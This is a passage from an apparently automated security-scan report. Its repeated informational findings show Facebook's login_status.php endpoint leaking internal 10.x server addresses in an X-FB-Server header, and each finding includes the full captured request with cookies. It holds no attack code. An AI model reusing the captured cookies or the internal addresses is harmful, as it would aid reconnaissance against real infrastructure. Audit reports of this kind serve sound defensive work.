GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df379c3f47c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328874168%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37ca3aa68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18beb5df%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d9b12d94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f18beb5df&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3632fa79c&relation=parent&transport=postmessage&frame=f289576d0c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.119.105
X-Cnection: close
Date: Thu, 05 May 2011 02:01:25 GMT
Content-Length: 0


20.127. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.212.48

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df122d98cc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df213bfbdf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d5e0cd54%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10f19205%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24a53a79%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f10f19205&origin=http%3A%2F%2Faol.sportingnews.com%2Ff239a70d58&relation=parent&transport=postmessage&frame=f25eafb0fc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.212.48
X-Cnection: close
Date: Thu, 05 May 2011 01:34:59 GMT
Content-Length: 0


20.128. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.149.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df351b92654%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35817e98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ad19734%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c10c79a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27060182c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3c10c79a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff27b5ca4c&relation=parent&transport=postmessage&frame=f23b33c9d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.120
X-Cnection: close
Date: Thu, 05 May 2011 01:07:06 GMT
Content-Length: 0


20.129. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.98.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a532ee94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23c7b4618%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffafd36bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cf608678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9bf6921c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1cf608678&origin=http%3A%2F%2Faol.sportingnews.com%2Ffeb4109d&relation=parent&transport=postmessage&frame=f1fb0a50a
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.98.37
X-Cnection: close
Date: Thu, 05 May 2011 00:57:41 GMT
Content-Length: 0


20.130. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.154.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15b6177e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f24d857c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df178b6bc34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa697f414%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6735cacc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fa697f414&origin=http%3A%2F%2Faol.sportingnews.com%2Ff196f61654&relation=parent&transport=postmessage&frame=f19584ca38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.49
X-Cnection: close
Date: Thu, 05 May 2011 02:13:41 GMT
Content-Length: 0


20.131. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.189.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1449ba928%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2854a4658%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33bf92f6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ce9ef94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e3a27ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ce9ef94&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3a231358&relation=parent&transport=postmessage&frame=f1cd400d2
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.189.38
X-Cnection: close
Date: Thu, 05 May 2011 01:58:36 GMT
Content-Length: 0


20.132. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.207.23

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36734dc74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df271ab54d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5886a7f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cf676a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df81f0229c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3cf676a08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1ce147b9c&relation=parent&transport=postmessage&frame=f2397ff58
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.207.23
X-Cnection: close
Date: Thu, 05 May 2011 01:47:22 GMT
Content-Length: 0


20.133. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.53.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d83ad36%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7e5136a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b43c5954%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfacdd34b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39c51df98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=facdd34b&origin=http%3A%2F%2Faol.sportingnews.com%2Ff79b6de9c&relation=parent&transport=postmessage&frame=f77cf04
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.53.27
X-Cnection: close
Date: Thu, 05 May 2011 01:48:44 GMT
Content-Length: 0


20.134. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.75.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d02d1918%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df244daaf6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fb037e54%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fcb5d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ae5faab%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1fcb5d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b28476fc&relation=parent&transport=postmessage&frame=f1a91f628
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.75.41
X-Cnection: close
Date: Thu, 05 May 2011 01:50:18 GMT
Content-Length: 0


20.135. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.155.48

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28a29b0ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35de660e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17a21e508%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df293a15c18%26origin%3Dhttp%253A%252F%252F